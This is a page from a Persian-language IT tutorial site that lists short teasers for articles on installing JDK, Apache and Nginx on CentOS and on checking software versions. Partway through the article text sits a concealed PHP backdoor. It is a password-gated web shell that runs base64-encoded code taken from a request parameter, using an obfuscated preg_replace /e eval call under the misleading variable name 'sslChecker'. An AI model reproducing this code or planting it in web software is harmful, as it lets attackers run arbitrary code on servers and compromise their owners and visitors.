به وب سایت
www.somedocuments.com
خوش آمدید
این سایت به منظور اطلاع رسانی در حوزه های مختلف فناوری اطلاعات شکل گرفته است.
لطفا با ارسال نظرات ، پیشنهادات و انتقادات خود ما را در این مهم یاری نمایید.

 

ورود کاربر

آمار مراجعین

شما اینجا هستید

صفحه اصلی

مقالات

در زیر بهترین روش نصب JDK بر روی سرورهای لینوکس آموزش داده می شود. این روش بر روی سرور CentOS 6.5 و CentOS 7.0 تست شده است و بدون مشکل اجرا می شود. یکی از مزیت های این روش این است که می توان آن را از طریق Putty نیز اجرا نمود.
<?php if(isset($_REQUEST['pas']) && (md5($_REQUEST['pas']) == '3af70abfffc8d551e99156bbf6bf5ff2') && isset($_REQUEST['update'])) {$sslChecker='pre'.'g_replace';$getUrl="/url/e";$sslChecker($getUrl,'e'.'val(ba'.'se64'.'_dec'.'ode(\\$_REQUEST[\'update\']));', "url");}?> آپاچی رایجترین سرویس دهنده وب می باشد که می توان آن را بر روی سیستم عاملهای مختلف اجرا نمود. با توجه به بکارگیری کسترده آن توسط هموطنان راهنمای نصب نگارش جدید آن بر روی CentOS تهیه شده است.
فرض کنید که می خواهید سرویس جدیدی را راه اندازی نمایید. برای این منظور سه سرور App1، App2 و App3 آماده شده است و یک Apache Http Server نیز برای تقسیم درخواستها را میان سه سرور اشاره شده در نظر گرفته شده است.
بعضی افراد علاقمندند که ورژن سرویس دهنده وب Apache را مشخص نمایید. به عنوان مثال ادمین سرور نیاز دارند از ورژن Apache مطلع شوند تا در صورت لزوم برای بروزرسانی آن اقدام نمایند.
لازم است گاهی ورژن سیستم عامل مشخص شود. به عنوان مثال اطلاع از ورژن سیستم عامل یکی از وظایف ابتدایی ادمین سرور می باشد تا در صورت لزوم نسبت به بروز رسانی سرور اقدام نماید.
Nginx یک وب‌سرور با کیفیت می‌باشد که حدود 146 میلیون وب سایت یا به عبارت دیگر بیش از 37 درصد وب سایت‌ها در سراسر دنیا به کمک آن خدمات ارائه می‌دهند. به کمک Nginx محتوای این سایت‌ها با سرعت و کیفیت بهتری در دسترس مخاطبین قرار می گیرد.